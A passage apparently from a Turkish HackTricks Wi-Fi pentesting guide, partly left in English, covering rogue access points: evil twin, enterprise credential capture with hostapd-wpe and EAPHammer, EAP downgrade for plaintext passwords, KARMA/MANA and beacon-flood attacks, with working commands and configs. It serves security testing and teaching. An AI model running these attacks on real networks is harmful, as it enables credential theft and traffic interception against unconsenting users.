• İstasyonlar, aynı ESSID'yi paylaşan AP'ler arasında dolaşabilir ve bir binada veya alanda bağlantıyı sürdürebilir.
• Protokol, istasyonun ESS'ye kimlik doğrulamasını gerektirir, ancak AP'nin istasyona kimlik doğrulamasını zorunlu kılmaz.

Tercih Edilen Ağ Listeleri (PNL)

• İstasyonlar, bağlandıkları her kablosuz ağın ESSID'sini ve ağa özgü yapılandırma ayrıntılarını Tercih Edilen Ağ Listesi'nde (PNL) saklar.
• PNL, bilinen ağlara otomatik olarak bağlanmak için kullanılır ve bağlantı sürecini basitleştirerek kullanıcının deneyimini iyileştirir.

Pasif Tarama

• AP'ler periyodik olarak yayın çerçeveleri göndererek varlıklarını ve özelliklerini duyururlar, AP'nin ESSID'sini yayınlamama durumu hariç.
• Pasif tarama sırasında istasyonlar yayın çerçevelerini dinler. Bir yayın çerçevesinin ESSID'si istasyonun PNL'deki bir girişle eşleşirse, istasyon otomatik olarak o AP'ye bağlanabilir.
• Bir cihazın PNL'sinin bilinmesi, bilinen bir ağın ESSID'sini taklit ederek cihazın sahte bir AP'ye bağlanmasını sağlayarak potansiyel bir sömürüye olanak tanır.

Aktif Sorgulama

• Aktif sorgulama, istasyonların yakındaki AP'leri ve özelliklerini keşfetmek için sorgu istekleri göndermesini içerir.
• Yönlendirilmiş sorgu istekleri belirli bir ESSID'yi hedef alarak, gizli bir ağ olsa bile belirli bir ağın menzilde olup olmadığını tespit etmeye yardımcı olur.
• Yayın sorgu istekleri, boş bir SSID alanına sahiptir ve yakındaki tüm AP'lere gönderilir, istasyonun PNL içeriğini ifşa etmeden tercih edilen herhangi bir ağı kontrol etmesine olanak tanır.

İnternete yönlendirme ile Basit AP

Daha karmaşık saldırıları nasıl gerçekleştireceğimizi açıklamadan önce, sadece bir AP oluşturmanın ve trafiğini İnternet'e bağlı bir arayüze yönlendirmenin nasıl yapılacağı açıklanacaktır.

ifconfig -a kullanarak, AP oluşturmak için kullanılacak wlan arayüzünün ve İnternet'e bağlı arayüzün mevcut olduğunu kontrol edin.

DHCP ve DNS

apt-get install dnsmasq #Manages DHCP and DNS

/etc/dnsmasq.conf konfigürasyon dosyasını oluşturun:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Ardından IP'leri ayarlayın ve yolları belirleyin:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Ve ardından dnsmasq'ı başlatın:

dnsmasq -C dnsmasq.conf -d

hostapd

hostapd, bir kablosuz erişim noktası (AP) yazılımıdır. Bu yazılım, bir bilgisayarın veya donanım cihazının kablosuz bir ağa erişim noktası olarak çalışmasını sağlar. hostapd, IEEE 802.11 standartlarına uygun olarak çalışır ve WPA/WPA2 şifreleme protokollerini destekler.

hostapd, birçok farklı kablosuz kart ve sürücü ile uyumlu çalışabilir. Bu sayede, bir bilgisayarın veya donanım cihazının kablosuz ağa erişim noktası olarak kullanılabilmesi için gereken işlevleri sağlar.

hostapd, birçok farklı kablosuz ağ saldırısı ve test senaryosunda kullanılabilir. Örneğin, bir ağa yetkisiz erişim sağlamak veya ağ trafiğini izlemek için kullanılabilir. Ayrıca, hostapd kullanarak WPA/WPA2 şifreleme protokollerini zayıflıklarını test edebilir ve ağ güvenliği açısından iyileştirmeler yapabilirsiniz.

hostapd, geniş bir kablosuz ağ test araçları koleksiyonunun bir parçasıdır ve birçok farklı senaryoda kullanılabilir. Bu nedenle, kablosuz ağ güvenliği testleri yaparken hostapd'yi kullanmayı düşünebilirsiniz.

apt-get install hostapd

Aşağıdaki komutu kullanarak hostapd.conf adında bir yapılandırma dosyası oluşturun:

nano hostapd.conf

Dosyanın içeriğini aşağıdaki gibi düzenleyin:

interface=wlan0
driver=nl80211
ssid=MyWiFiNetwork
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=MyPassword
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

Dosyayı kaydedin ve çıkın.

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Irritantı olan işlemleri durdurun, izleme modunu ayarlayın ve hostapd'yi başlatın:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Yönlendirme ve Yönlendirme

Forwarding and redirection are techniques used in networking to redirect traffic from one network location to another. These techniques are commonly used in the context of pentesting WiFi networks to redirect traffic to an attacker-controlled device.

Port Forwarding

Port forwarding is a technique used to redirect traffic from a specific port on a router or firewall to a specific port on a different device within the network. This allows external traffic to reach a specific service or application running on the internal device.

To perform port forwarding, you need to access the router or firewall's configuration settings and create a rule that maps the external port to the internal IP address and port of the target device.

DNS Redirection

DNS redirection involves manipulating the DNS resolution process to redirect traffic from a specific domain name to a different IP address. This technique can be used to redirect traffic from a legitimate website to a malicious server controlled by the attacker.

To perform DNS redirection, you can modify the DNS settings on the target device or compromise a DNS server to inject malicious DNS records. This way, when a user tries to access the legitimate website, they will be redirected to the attacker's server instead.

URL Redirection

URL redirection involves redirecting traffic from one URL to another. This technique is commonly used in phishing attacks, where the attacker creates a malicious website that looks similar to a legitimate one and redirects users to it.

URL redirection can be achieved by modifying the web server's configuration or by using client-side techniques such as JavaScript or HTML meta tags.

ARP Spoofing

ARP spoofing is a technique used to redirect network traffic by manipulating the ARP (Address Resolution Protocol) cache of devices on the network. By sending fake ARP messages, an attacker can associate their MAC address with the IP address of another device, causing traffic intended for that device to be redirected to the attacker's device.

ARP spoofing can be used to redirect traffic within a local network or between different networks if the attacker has access to a device that acts as a gateway between them.

Conclusion

Forwarding and redirection techniques are powerful tools in a pentester's arsenal. By redirecting traffic, an attacker can intercept and manipulate network communications, allowing them to gather sensitive information or launch further attacks. It is important for network administrators to be aware of these techniques and implement appropriate security measures to prevent unauthorized redirection of traffic.

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Kötü İkiz

Kötü ikiz saldırısı, WiFi istemcilerinin ağları tanımlama şeklini sömürür ve temel istasyonun (erişim noktası) istemciye kimlik doğrulaması yapmadan önce ağ adına (ESSID) başvurur. Ana noktalar şunları içerir:

• Farklılaştırmada Zorluk: Cihazlar, aynı ESSID ve şifreleme türünü paylaşan meşru ve sahte erişim noktalarını ayırt etmekte zorlanır. Gerçek dünya ağları genellikle aynı ESSID'ye sahip birden fazla erişim noktası kullanarak kapsama alanını sorunsuz bir şekilde genişletir.

• İstemci Gezintisi ve Bağlantı Manipülasyonu: 802.11 protokolü, cihazların aynı ESS içindeki erişim noktaları arasında gezinmesine izin verir. Saldırganlar, cihazı mevcut temel istasyondan ayırıp sahte bir istasyona bağlamak için bunu sömürebilir. Bu, daha güçlü bir sinyal sunarak veya deauthentication paketleri veya jamming gibi yöntemlerle meşru erişim noktasıyla bağlantıyı bozarak başarılabiir.

• Yürütmede Zorluklar: Birden fazla, iyi yerleştirilmiş erişim noktasına sahip ortamlarda kötü ikiz saldırısını başarıyla gerçekleştirmek zor olabilir. Tek bir meşru erişim noktasının deauthentication'ı, saldırgan tüm yakındaki erişim noktalarını deauthentication yapamazsa cihazın başka bir meşru erişim noktasına bağlanmasına neden olur veya sahte erişim noktasını stratejik olarak yerleştiremezse.

Çok temel bir Açık Kötü İkiz (trafiği İnternet'e yönlendirememe yeteneği olmayan) oluşturabilirsiniz:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

Ayrıca eaphammer kullanarak Kötü İkiz oluşturabilirsiniz (eaphammer ile kötü ikizler oluşturmak için arayüzün monitor modunda OLMAMASI gerektiğini unutmayın):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Veya Airgeddon kullanarak: Seçenekler: 5,6,7,8,9 (Evil Twin saldırısı menüsü içinde).

Lütfen unutmayın, varsayılan olarak, ESSID PNL'de WPA korumalı olarak kaydedilmişse, cihaz otomatik olarak Açık evil twin'e bağlanmaz. Gerçek AP'yi DoS yapmayı deneyebilir ve kullanıcının el ile Açık evil twin'e bağlanmasını umabilirsiniz, veya gerçek AP'yi DoS yapabilir ve bir WPA Evil Twin kullanarak handshake'i yakalayabilirsiniz (bu yöntemi kullanarak kurbanın size bağlanmasına izin veremezsiniz çünkü PSK'yi bilmiyorsunuz, ancak handshake'i yakalayabilir ve kırmaya çalışabilirsiniz).

Bazı işletim sistemleri ve antivirüs programları kullanıcıyı Açık bir ağa bağlanmanın tehlikeli olduğu konusunda uyarır...

WPA/WPA2 Evil Twin

WPA/2 kullanarak Evil Twin oluşturabilirsiniz ve cihazlar WPA/2 ile o SSID'ye bağlanacak şekilde yapılandırılmışlarsa, bağlanmaya çalışacaklardır. Her neyse, 4 yönlü handshake'i tamamlamak için ayrıca istemcinin kullanacağı şifreyi bilmek gerekmektedir. Eğer bilmıyorsanız, bağlantı tamamlanmayacaktır.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Kurumsal Kötü İkiz

Bu saldırıları anlamak için önce WPA Kurumsal açıklamasını okumanızı öneririm.

hostapd-wpe kullanımı

hostapd-wpe çalışması için bir yapılandırma dosyasına ihtiyaç duyar. Bu yapılandırmaların otomatik olarak oluşturulmasını sağlamak için https://github.com/WJDigby/apd_launchpad adresinden (python dosyasını /etc/hostapd-wpe/ içine indirin) yararlanabilirsiniz.

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

Yapılandırma dosyasında ssid, kanal, kullanıcı dosyaları, sertifika/anahtar, dh parametreleri, wpa sürümü ve kimlik doğrulama gibi birçok farklı şey seçebilirsiniz...

EAP-TLS ile herhangi bir sertifikanın girişine izin vermek için hostapd-wpe kullanma.

EAPHammer kullanma

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Varsayılan olarak, EAPHammer bu kimlik doğrulama yöntemlerini kullanır (daha güçlü kimlik doğrulama yöntemlerini kullanmadan önce düz metin şifrelerini elde etmek için ilk olarak GTC'yi dikkate alın):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Bu, uzun bağlantı sürelerini önlemek için varsayılan metodolojidir. Bununla birlikte, sunucuya en zayıf olanından en güçlüsüne kadar kimlik doğrulama yöntemlerini belirtmek de mümkündür:

--negotiate weakest

Veya şunları da kullanabilirsiniz:

• --negotiate gtc-downgrade ile yüksek verimli GTC düşürme uygulamasını kullanarak (düz metin şifreleri)
• --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP elle yöntemleri belirtmek için (saldırının organizasyonun aynı sırayla aynı kimlik doğrulama yöntemlerini sunması, saldırının tespit edilmesini çok daha zor hale getirecektir).
• Daha fazla bilgi için wiki'ye bakın

Airgeddon Kullanımı

Airgeddon, WPA/WPA2-Enterprise ağlarına EAP kimlik doğrulama sunmak için önceden oluşturulmuş sertifikaları kullanabilir. Sahte ağ, bağlantı protokolünü EAP-MD5'e düşürerek kullanıcının ve şifrenin MD5'ini yakalayabilir. Daha sonra saldırgan şifreyi kırmayı deneyebilir.
Airggedon, sürekli Evil Twin saldırısı (gürültülü) veya sadece biri bağlandığında Evil Attack oluşturma (düzgün) olasılığını size sunar.

Evil Twins saldırılarında PEAP ve EAP-TTLS TLS tünellerinin hata ayıklanması

Bu yöntem bir PEAP bağlantısında test edildi, ancak bir TLS tünelini şifre çözüyorum, bu nedenle EAP-TTLS ile de çalışmalı

hostapd-wpe yapılandırması içinde dh_file içeren satırı yorumlayın (dh_file=/etc/hostapd-wpe/certs/dh'den #dh_file=/etc/hostapd-wpe/certs/dh'ye kadar)
Bu, hostapd-wpe'nin anahtarları DH yerine RSA kullanarak değiştirmesini sağlar, böylece daha sonra trafiği sunucunun özel anahtarını bilerek şifre çözebilirsiniz.

Şimdi, bu değiştirilmiş yapılandırmayla Evil Twin'i hostapd-wpe kullanarak normal şekilde başlatın. Ayrıca, Evil Twin saldırısını gerçekleştiren arayüzde wireshark'ı başlatın.

Şimdi veya daha sonra (zaten bazı kimlik doğrulama girişimlerini yakaladıysanız), wireshark'a özel RSA anahtarını ekleyebilirsiniz: Düzenle --> Tercihler --> Protokoller --> TLS --> (RSA anahtarları listesi) Düzenle...

Yeni bir giriş ekleyin ve formu şu değerlerle doldurun: IP adresi = herhangi -- Port = 0 -- Protokol = veri -- Anahtar Dosyası (anahtar dosyanızı seçin, sorunları önlemek için parola koruması olmayan bir anahtar dosyası seçin).

Ve yeni "Şifrelenmiş TLS" sekmesine bakın:

KARMA, MANA, Gürültülü MANA ve Bilinen yayın saldırısı

ESSID ve MAC siyah/beyaz listeleri

Rogue Erişim Noktasının (AP) davranışı üzerindeki etkileri ve bunların modlarına ve bunların davranışlarına etkileriyle ilgili farklı türde Medya Erişim Kontrolü Filtre Listeleri (MFACL'ler):

1. MAC tabanlı Beyaz Liste:

• Rogue AP, yalnızca beyaz listede belirtilen cihazların probe isteklerine yanıt verecek şekilde yanıt verir ve diğer tüm cihazlar için görünmez kalır.

2. MAC tabanlı Kara Liste:

• Rogue AP, kara listedeki cihazlardan gelen probe isteklerine yanıt vermeyecektir, bu da rogue AP'yi bu belirli cihazlara karşı görünmez hale getirir.

3. ESSID tabanlı Beyaz Liste:

• Rogue AP, yalnızca belirli ESSID'ler için probe isteklerine yanıt verecek şekilde yanıt verir, bu da tercih edilen ağ listelerinde (PNL) bu ESSID'leri içermeyen cihazlar için görünmez hale getirir.

4. ESSID tabanlı Kara Liste:

• Rogue AP, kara listedeki belirli ESSID'ler için probe isteklerine yanıt vermeyecektir, bu da bu özel ağları arayan cihazlar için görünmez hale getirir.

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

Bu yöntem, ağlara bağlanmak için arayan cihazların tüm sorgu isteklerine yanıt veren kötü niyetli bir erişim noktası (AP) oluşturmayı sağlar. Bu teknik, cihazları aradıkları ağları taklit ederek, cihazların saldırganın AP'sine bağlanmasını sağlar. Bir cihaz bu sahte AP'ye bağlantı isteği gönderdiğinde, bağlantı tamamlanır ve cihaz saldırganın ağına yanlışlıkla bağlanır.

MANA

Daha sonra, cihazlar istenmeyen ağ yanıtlarını görmezden gelmeye başladı, bu da orijinal karma saldırısının etkinliğini azalttı. Bununla birlikte, Ian de Villiers ve Dominic White tarafından tanıtılan MANA saldırısı adlı yeni bir yöntem ortaya çıktı. Bu yöntem, sahte AP'nin cihazların yayınlanan sorgu isteklerine ağ adları (SSID'ler) ile yanıt vererek cihazlardan Tercih Edilen Ağ Listelerini (PNL) yakalamasını içerir. Bu sofistike saldırı, cihazların bilinen ağları hatırlama ve önceliklendirme şeklini istismar ederek, orijinal karma saldırısına karşı korumaları atlar.

MANA saldırısı, cihazların hem yönlendirilmiş hem de yayınlanan sorgu isteklerini izleyerek çalışır. Yönlendirilmiş istekler için, cihazın MAC adresini ve istenen ağ adını kaydederek bu bilgileri bir listeye ekler. Bir yayınlanan istek alındığında, AP, cihazın listesindeki herhangi bir ağla eşleşen bilgilerle yanıt verir ve cihazı sahte AP'ye bağlanmaya teşvik eder.

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Gürültülü MANA

Gürültülü MANA saldırısı, cihazların yönlendirilmiş sorgulama yapmadığı veya tercih edilen ağ listelerinin (PNL) saldırgan tarafından bilinmediği durumlarda kullanılan gelişmiş bir stratejidir. Bu saldırı, aynı bölgedeki cihazların PNL'lerinde bazı ağ adlarını paylaşma olasılığına dayanır. Seçici olarak yanıt vermek yerine, bu saldırı, gözlemlenen tüm cihazların birleşik PNL'lerinde bulunan her ağ adı (ESSID) için yayınlanan sorgu yanıtları gönderir. Bu geniş yaklaşım, bir cihazın tanıdık bir ağı tanıması ve sahte Erişim Noktasına (AP) bağlanmaya çalışması şansını artırır.

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Bilinen Beacon saldırısı

Yüksek sesli MANA saldırısı yeterli olmadığında, Bilinen Beacon saldırısı başka bir yaklaşım sunar. Bu yöntem, bir kelime listesinden türetilen potansiyel ESSID'lerin bir listesini döngüsel olarak yanıt veren bir AP simüle ederek bağlantı sürecini kaba kuvvetle gerçekleştirir. Bu, birçok ağın varlığını taklit ederek, kurbanın PNL'sindeki bir ESSID'yi eşleme umuduyla sahte AP'ye bağlantı denemesini tetikler. Saldırı, cihazları tuzaklamak için daha agresif bir deneme için --loud seçeneğiyle birleştirilerek artırılabilir.

Eaphammer, bu saldırıyı MANA saldırısı olarak uygular ve bir listedeki tüm ESSID'leri şarj eder (bunu --loud ile birleştirerek Yüksek sesli MANA + Bilinen beaconlar saldırısı da oluşturabilirsiniz):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Bilinen Beacon Burst saldırısı

Bilinen Beacon Burst saldırısı, bir dosyada listelenen her ESSID için beacon çerçevelerinin hızlı bir şekilde yayınlanmasını içerir. Bu, sahte ağların yoğun bir ortamının oluşturulmasını sağlar ve özellikle MANA saldırısı ile birleştirildiğinde cihazların yanıltıcı AP'ye bağlanma olasılığını büyük ölçüde artırır. Bu teknik, cihazların ağ seçim mekanizmalarını aşmak için hız ve hacmi kullanır.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct, geleneksel kablosuz erişim noktasına ihtiyaç duymadan cihazların birbirleriyle doğrudan Wi-Fi üzerinden bağlantı kurmasını sağlayan bir protokoldür. Bu yetenek, yazıcılar ve televizyonlar gibi çeşitli Nesnelerin İnterneti (IoT) cihazlarında entegre edilmiştir ve cihazlar arası doğrudan iletişimi kolaylaştırır. Wi-Fi Direct'in dikkate değer bir özelliği, bağlantıyı yönetmek için bir cihazın erişim noktası rolünü üstlenmesi olan grup sahibidir.

Wi-Fi Direct bağlantıları için güvenlik, Wi-Fi Protected Setup (WPS) aracılığıyla sağlanır ve güvenli eşleştirme için birkaç yöntemi destekler, bunlar arasında:

• Push-Button Configuration (PBC)
• PIN girişi
• Yakın Alan İletişimi (NFC)

Bu yöntemler, özellikle PIN girişi, geleneksel Wi-Fi ağlarında WPS ile aynı zayıflıklara karşı hassastır ve benzer saldırı vektörlerinin hedefi olabilir.

EvilDirect Hijacking

EvilDirect Hijacking, Wi-Fi Direct'e özgü bir saldırıdır. Bu saldırı, Evil Twin saldırısının kavramını yansıtır, ancak Wi-Fi Direct bağlantılarını hedef alır. Bu senaryoda, saldırgan, cihazları kötü niyetli bir varlıkla bağlantı kurmaya ikna etmek amacıyla meşru bir grup sahibini taklit eder. Bu yöntem, airbase-ng gibi araçlar kullanılarak gerçekleştirilebilir ve taklit edilen cihazın kanalını, ESSID'sini ve MAC adresini belirterek yapılır:

Referanslar

• https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
• https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9
• https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38
• https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
• https://github.com/gdssecurity/Whitepapers/blob/master/GDS%20Labs%20-%20Identifying%20Rogue%20Access%20Point%20Attacks%20Using%20Probe%20Response%20Patterns%20and%20Signal%20Strength.pdf
• http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/
• https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
• https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d
• https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
• https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/

TODO: https://github.com/wifiphisher/wifiphisher'a göz atın (facebook ile giriş ve captive portalde WPA taklit)

Deneyimli hackerlar ve ödül avcılarıyla iletişim kurmak için HackenProof Discord sunucusuna katılın!

Hacking Insights
Hacking'in heyecanını ve zorluklarını inceleyen içeriklerle etkileşime geçin

Gerçek Zamanlı Hack Haberleri
Hızlı tempolu hacking dünyasını gerçek zamanlı haberler ve içgörülerle takip edin

En Son Duyurular
Yeni ödül avı başlatmaları ve önemli platform güncellemeleri hakkında bilgi sahibi olun

Bugün en iyi hackerlarla işbirliği yapmak için Discord adresimize katılın!

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

• Şirketinizi HackTricks'te reklam vermek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARINA göz atın!
• Resmi PEASS & HackTricks ürünlerini edinin
• Özel NFT'lerden oluşan koleksiyonumuz olan The PEASS Family'yi keşfedin
• 💬 Discord grubuna veya telegram grubuna katılın veya bizi Twitter'da takip edin 🐦 @hacktricks_live.
• Hacking hilelerinizi paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.